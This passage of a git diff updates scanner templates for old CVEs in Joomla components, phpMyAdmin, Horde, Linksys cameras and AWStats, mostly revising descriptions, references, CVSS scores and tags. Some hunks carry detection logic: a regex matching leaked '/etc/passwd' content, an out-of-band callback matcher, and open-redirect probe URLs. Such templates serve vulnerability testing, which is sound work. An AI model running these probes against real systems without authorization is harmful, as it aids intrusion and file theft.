-  description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
+  description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
   reference:
     - https://www.exploit-db.com/exploits/5856
+    - http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
     - https://nvd.nist.gov/vuln/detail/CVE-2008-6668
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2008-6668
-  tags: nweb2fax,lfi,cve,cve2008,traversal
+    cwe-id: CWE-22
+  tags: cve2008,nweb2fax,lfi,traversal,edb,cve
 
 requests:
   - method: GET
@@ -20,10 +25,14 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
+
       - type: regex
         part: body
         regex:
           - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-0545.yaml b/cves/2009/CVE-2009-0545.yaml
index 53b6417ad6..3103602795 100644
--- a/cves/2009/CVE-2009-0545.yaml
+++ b/cves/2009/CVE-2009-0545.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/8023
     - https://nvd.nist.gov/vuln/detail/CVE-2009-0545
+    - http://www.zeroshell.net/eng/announcements/
+    - http://www.ikkisoft.com/stuff/LC-2009-01.txt
   classification:
     cve-id: CVE-2009-0545
-  tags: cve,cve2009,zeroshell,kerbynet,rce
+  tags: edb,cve,cve2009,zeroshell,kerbynet,rce
 
 requests:
   - method: GET
diff --git a/cves/2009/CVE-2009-0932.yaml b/cves/2009/CVE-2009-0932.yaml
index 0bf0d808c8..747fd013f0 100644
--- a/cves/2009/CVE-2009-0932.yaml
+++ b/cves/2009/CVE-2009-0932.yaml
@@ -1,16 +1,21 @@
 id: CVE-2009-0932
 
 info:
-  name: Horde - Horde_Image::factory driver Argument LFI
+  name: Horde/Horde Groupware - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
+  description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
   reference:
     - https://www.exploit-db.com/exploits/16154
+    - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
+    - http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
     - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2009-0932
-  tags: cve,cve2009,horde,lfi,traversal
+    cwe-id: CWE-22
+  tags: cve,cve2009,horde,lfi,traversal,edb
 
 requests:
   - method: GET
@@ -27,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml
index 49485fc6a8..366b3af91b 100644
--- a/cves/2009/CVE-2009-1151.yaml
+++ b/cves/2009/CVE-2009-1151.yaml
@@ -1,16 +1,22 @@
 id: CVE-2009-1151
 
 info:
-  name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
+  name: PhpMyAdmin Scripts - Remote Code Execution
   author: princechaddha
-  severity: high
-  description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
+  severity: critical
+  description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
   reference:
     - https://www.phpmyadmin.net/security/PMASA-2009-3/
     - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
+    - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
+    - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-1151
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
     cve-id: CVE-2009-1151
-  tags: cve,cve2009,phpmyadmin,rce,deserialization
+    cwe-id: CWE-77
+  tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
 
 requests:
   - raw:
@@ -32,3 +38,5 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1496.yaml b/cves/2009/CVE-2009-1496.yaml
index 4ab863864d..66d11ba7e3 100644
--- a/cves/2009/CVE-2009-1496.yaml
+++ b/cves/2009/CVE-2009-1496.yaml
@@ -1,16 +1,21 @@
 id: CVE-2009-1496
 
 info:
-  name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
+  name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
+  description: |
+    Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/8367
-    - https://www.cvedetails.com/cve/CVE-2009-1496
+    - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-1496
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2009-1496
-  tags: cve,cve2009,joomla,lfi
+    cwe-id: CWE-22
+  tags: joomla,lfi,edb,cve,cve2009
 
 requests:
   - method: GET
@@ -27,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml
index 8c6358eda1..455bf0359c 100644
--- a/cves/2009/CVE-2009-1558.yaml
+++ b/cves/2009/CVE-2009-1558.yaml
@@ -1,15 +1,22 @@
 id: CVE-2009-1558
 
 info:
-  name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
+  name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
+  description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
   reference:
     - https://www.exploit-db.com/exploits/32954
+    - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
+    - http://www.vupen.com/english/advisories/2009/1173
+    - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-1558
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2009-1558
-  tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
+    cwe-id: CWE-22
+  tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
 
 requests:
   - method: GET
@@ -25,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml
index 96c0351e1a..bdc9a7e4fd 100644
--- a/cves/2009/CVE-2009-1872.yaml
+++ b/cves/2009/CVE-2009-1872.yaml
@@ -1,19 +1,22 @@
 id: CVE-2009-1872
 
 info:
-  name: Adobe Coldfusion 8 linked XSS vulnerabilies
+  name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
   author: princechaddha
   severity: medium
-  description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
+  description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
   reference:
-    - https://www.securityfocus.com/archive/1/505803/100/0/threaded
+    - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
     - https://www.tenable.com/cve/CVE-2009-1872
+    - http://www.adobe.com/support/security/bulletins/apsb09-12.html
+    - http://www.dsecrg.com/pages/vul/show.php?id=122
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-1872
   classification:
     cve-id: CVE-2009-1872
   metadata:
-    verified: true
     shodan-query: http.component:"Adobe ColdFusion"
-  tags: cve,cve2009,adobe,xss,coldfusion
+    verified: "true"
+  tags: cve,cve2009,adobe,xss,coldfusion,tenable
 
 requests:
   - method: GET
@@ -35,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2009/CVE-2009-2015.yaml b/cves/2009/CVE-2009-2015.yaml
index 687b6ba466..a474ff1b28 100644
--- a/cves/2009/CVE-2009-2015.yaml
+++ b/cves/2009/CVE-2009-2015.yaml
@@ -1,16 +1,22 @@
 id: CVE-2009-2015
 
 info:
-  name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
+  name: Joomla! MooFAQ 1.0 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+  description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
   reference:
     - https://www.exploit-db.com/exploits/8898
     - https://www.cvedetails.com/cve/CVE-2009-2015
+    - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
+    - http://www.vupen.com/english/advisories/2009/1530
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-2015
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2009-2015
-  tags: cve,cve2009,joomla,lfi
+    cwe-id: CWE-22
+  tags: joomla,lfi,edb,cve,cve2009
 
 requests:
   - method: GET
@@ -27,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-2100.yaml b/cves/2009/CVE-2009-2100.yaml
index f17696552a..10d0f59046 100644
--- a/cves/2009/CVE-2009-2100.yaml
+++ b/cves/2009/CVE-2009-2100.yaml
@@ -1,16 +1,22 @@
 id: CVE-2009-2100
 
 info:
-  name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
+  name: Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
+  description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/8946
     - https://www.cvedetails.com/cve/CVE-2009-2100
+    - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-2100
+
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2009-2100
-  tags: cve,cve2009,joomla,lfi
+    cwe-id: CWE-22
+  tags: cve,cve2009,joomla,lfi,edb
 
 requests:
   - method: GET
@@ -27,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-3053.yaml b/cves/2009/CVE-2009-3053.yaml
index 796cb2ec01..2a5e91b46d 100644
--- a/cves/2009/CVE-2009-3053.yaml
+++ b/cves/2009/CVE-2009-3053.yaml
@@ -1,16 +1,22 @@
 id: CVE-2009-3053
 
 info:
-  name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
+  name: Joomla! Agora 3.0.0b  - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
+  description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
   reference:
     - https://www.exploit-db.com/exploits/9564
     - https://www.cvedetails.com/cve/CVE-2009-3053
+    - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-3053
   classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
     cve-id: CVE-2009-3053
-  tags: cve,cve2009,joomla,lfi
+    cwe-id: CWE-22
+  tags: cve,cve2009,joomla,lfi,edb
 
 requests:
   - method: GET
@@ -27,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml
index e2c03c140a..fe8a9f6991 100644
--- a/cves/2009/CVE-2009-3318.yaml
+++ b/cves/2009/CVE-2009-3318.yaml
@@ -1,16 +1,18 @@
 id: CVE-2009-3318
 
 info:
-  name: Joomla! Component com_album 1.14 - Directory Traversal
+  name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
+  description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/9706
     - https://www.cvedetails.com/cve/CVE-2009-3318
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-3318
+    - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
   classification:
     cve-id: CVE-2009-3318
-  tags: cve,cve2009,joomla,lfi
+  tags: joomla,lfi,edb,cve,cve2009
 
 requests:
   - method: GET
@@ -27,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2009/CVE-2009-4202.yaml b/cves/2009/CVE-2009-4202.yaml
index cde51b56a3..72d2b72fac 100644
--- a/cves/2009/CVE-2009-4202.yaml
+++ b/cves/2009/CVE-2009-4202.yaml
@@ -1,16 +1,18 @@
 id: CVE-2009-4202
 
 info:
-  name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
+  name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
+  description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/8870
-    - https://www.cvedetails.com/cve/CVE-2009-4202
+    - http://www.vupen.com/english/advisories/2009/1494
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-4202
+    - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
   classification:
     cve-id: CVE-2009-4202
-  tags: cve,cve2009,joomla,lfi,photo
+  tags: cve2009,joomla,lfi,photo,edb,cve
 
 requests:
   - method: GET
@@ -27,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml
index a8d559586b..6c15468fe8 100644
--- a/cves/2009/CVE-2009-4223.yaml
+++ b/cves/2009/CVE-2009-4223.yaml
@@ -1,16 +1,19 @@
 id: CVE-2009-4223
 
 info:
-  name: KR-Web <= 1.1b2 RFI
+  name: KR-Web <=1.1b2 - Remote File Inclusion
   author: geeknik
   severity: high
-  description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
+  description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
   reference:
     - https://sourceforge.net/projects/krw/
     - https://www.exploit-db.com/exploits/10216
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
+    - http://www.exploit-db.com/exploits/10216
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-4223
   classification:
     cve-id: CVE-2009-4223
-  tags: cve,cve2009,krweb,rfi
+  tags: cve,cve2009,krweb,rfi,edb
 
 requests:
   - method: GET
@@ -26,3 +29,5 @@ requests:
         part: interactsh_protocol
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/06
diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml
index a6d270b89f..5b3eddb5f0 100644
--- a/cves/2009/CVE-2009-4679.yaml
+++ b/cves/2009/CVE-2009-4679.yaml
@@ -1,16 +1,19 @@
 id: CVE-2009-4679
 
 info:
-  name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
+  name: Joomla! Portfolio Nexus - Remote File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+  description: |
+    Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/33440
     - https://www.cvedetails.com/cve/CVE-2009-4679
+    - https://nvd.nist.gov/vuln/detail/CVE-2009-4679
+    - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
   classification:
     cve-id: CVE-2009-4679
-  tags: cve,cve2009,joomla,lfi,nexus
+  tags: cve,cve2009,joomla,lfi,nexus,edb
 
 requests:
   - method: GET
@@ -27,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml
index 2ad12cacca..6e9cbc2706 100644
--- a/cves/2009/CVE-2009-5020.yaml
+++ b/cves/2009/CVE-2009-5020.yaml
@@ -7,24 +7,25 @@ info:
   description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2009-5020
+    - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2009-5020
     cwe-id: CWE-601
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2020,redirect,awstats
+  tags: cve,cve2009,redirect,awstats
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/awstats/awredir.pl?url=example.com'
-      - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
+      - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
+      - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
     stop-at-first-match: true
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'  # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'  # https://regex101.com/r/ZDYhFh/1
 
 # Enhanced by mp on 2022/02/13
diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml
index 750d54d5cd..5af5b4b502 100644
--- a/cves/2009/CVE-2009-5114.yaml
+++ b/cves/2009/CVE-2009-5114.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/36994
     - https://www.cvedetails.com/cve/CVE-2009-5114
+    - http://websecurity.com.ua/2628/
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2009-5114
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2009,lfi
+  tags: edb,cve,cve2009,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0157.yaml b/cves/2010/CVE-2010-0157.yaml
index 27b02b1ed4..da7e3a7f63 100644
--- a/cves/2010/CVE-2010-0157.yaml
+++ b/cves/2010/CVE-2010-0157.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/10943
     - https://www.cvedetails.com/cve/CVE-2010-0157
+    - http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
+    - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-0157
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0219.yaml b/cves/2010/CVE-2010-0219.yaml
index 271add009d..1599e7084c 100644
--- a/cves/2010/CVE-2010-0219.yaml
+++ b/cves/2010/CVE-2010-0219.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2010-0219
     - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
+    - http://www.rapid7.com/security-center/advisories/R7-0037.jsp
+    - http://www.vupen.com/english/advisories/2010/2673
   classification:
     cve-id: CVE-2010-0219
   metadata:
diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml
index 82f7ef4d83..3fe2911280 100644
--- a/cves/2010/CVE-2010-0467.yaml
+++ b/cves/2010/CVE-2010-0467.yaml
@@ -8,13 +8,15 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11282
     - https://www.cvedetails.com/cve/CVE-2010-0467
+    - http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
+    - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
+  remediation: Apply all relevant security patches and upgrades.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
     cvss-score: 5.8
     cve-id: CVE-2010-0467
     cwe-id: CWE-22
-  remediation: Apply all relevant security patches and upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml
index 011cddc99d..13c6825f6c 100644
--- a/cves/2010/CVE-2010-0696.yaml
+++ b/cves/2010/CVE-2010-0696.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11447
     - https://www.cvedetails.com/cve/CVE-2010-0696
+    - http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/
+    - http://www.joomlaworks.gr/content/view/77/34/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-0696
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve,cve2010,joomla,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0759.yaml b/cves/2010/CVE-2010-0759.yaml
index d624499826..06f7036b6b 100644
--- a/cves/2010/CVE-2010-0759.yaml
+++ b/cves/2010/CVE-2010-0759.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11498
     - https://www.cvedetails.com/cve/CVE-2010-0759
+    - http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/
+    - http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2010-0759
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2010,joomla,lfi,plugin
+  tags: cve,cve2010,joomla,lfi,plugin,edb
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0942.yaml b/cves/2010/CVE-2010-0942.yaml
index 47f42f196c..7da6f78f24 100644
--- a/cves/2010/CVE-2010-0942.yaml
+++ b/cves/2010/CVE-2010-0942.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11089
     - https://www.cvedetails.com/cve/CVE-2010-0942
+    - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-0942
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml
index 0004004c0b..7e876effea 100644
--- a/cves/2010/CVE-2010-0943.yaml
+++ b/cves/2010/CVE-2010-0943.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11090
     - https://www.cvedetails.com/cve/CVE-2010-0943
+    - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
+    - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/
   classification:
     cve-id: CVE-2010-0943
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml
index feed3f23e9..f4466848fc 100644
--- a/cves/2010/CVE-2010-0944.yaml
+++ b/cves/2010/CVE-2010-0944.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11088
     - https://www.cvedetails.com/cve/CVE-2010-0944
+    - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
+    - http://www.exploit-db.com/exploits/11088
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-0944
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: cve2010,joomla,lfi,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0972.yaml b/cves/2010/CVE-2010-0972.yaml
index b645bee4fd..8407ae95f5 100644
--- a/cves/2010/CVE-2010-0972.yaml
+++ b/cves/2010/CVE-2010-0972.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/11738
     - https://www.cvedetails.com/cve/CVE-2010-0972
+    - http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/
+    - http://www.exploit-db.com/exploits/11738
+  remediation: Apply all relevant security patches and product upgrades.
   classification:
     cve-id: CVE-2010-0972
-  remediation: Apply all relevant security patches and product upgrades.
-  tags: cve,cve2010,joomla,lfi
+  tags: edb,cve,cve2010,joomla,lfi
 
 requests:
   - method: GET
diff --git a/cves/2010/CVE-2010-0982.yaml b/cves/2010/CVE-2010-0982.yaml
